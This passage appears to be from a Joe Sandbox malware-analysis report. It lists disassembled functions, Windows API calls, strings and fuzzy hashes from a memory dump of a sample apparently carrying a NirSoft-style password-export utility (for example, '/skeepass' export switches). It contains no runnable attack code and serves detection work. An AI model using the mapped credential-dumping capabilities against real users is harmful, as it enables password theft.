                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$FullNamePath$malloc$Version
                                                      • String ID: |A
                                                      • API String ID: 3356672799-1717621600
                                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                      • API String ID: 2081463915-1959339147
                                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                      • API String ID: 2012295524-70141382
                                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                      • API String ID: 667068680-3953557276
                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                      • String ID:
                                                      • API String ID: 1700100422-0
                                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                      • String ID:
                                                      • API String ID: 552707033-0
                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                      • strchr.MSVCRT ref: 0040C140
                                                      • strchr.MSVCRT ref: 0040C151
                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                      • memset.MSVCRT ref: 0040C17A
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                      • String ID: 4$h
                                                      • API String ID: 4066021378-1856150674
                                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_snwprintf
                                                      • String ID: %%0.%df
                                                      • API String ID: 3473751417-763548558
                                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                      APIs
                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                      • GetParent.USER32(?), ref: 00406136
                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                      • String ID: A
                                                      • API String ID: 2892645895-3554254475
                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                      APIs
                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                      • memset.MSVCRT ref: 0040DA23
                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                      • String ID: caption
                                                      • API String ID: 973020956-4135340389
                                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                      APIs
                                                      Strings
                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_snwprintf$wcscpy
                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                      • API String ID: 1283228442-2366825230
                                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                      APIs
                                                      • wcschr.MSVCRT ref: 00413972
                                                      • wcscpy.MSVCRT ref: 00413982
                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                      • wcscpy.MSVCRT ref: 004139D1
                                                      • wcscat.MSVCRT ref: 004139DC
                                                      • memset.MSVCRT ref: 004139B8
                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                      • memset.MSVCRT ref: 00413A00
                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                      • wcscat.MSVCRT ref: 00413A27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                      • String ID: \systemroot
                                                      • API String ID: 4173585201-1821301763
                                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscpy
                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                      • API String ID: 1284135714-318151290
                                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                      • String ID: 0$6
                                                      • API String ID: 4066108131-3849865405
                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                      APIs
                                                      • memset.MSVCRT ref: 004082EF
                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                      • memset.MSVCRT ref: 00408362
                                                      • memset.MSVCRT ref: 00408377
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 290601579-0
                                                      • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                      • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                      APIs
                                                      • memchr.MSVCRT ref: 00444EBF
                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                      • memset.MSVCRT ref: 0044505E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memchrmemset
                                                      • String ID: PD$PD
                                                      • API String ID: 1581201632-2312785699
                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                      APIs
                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
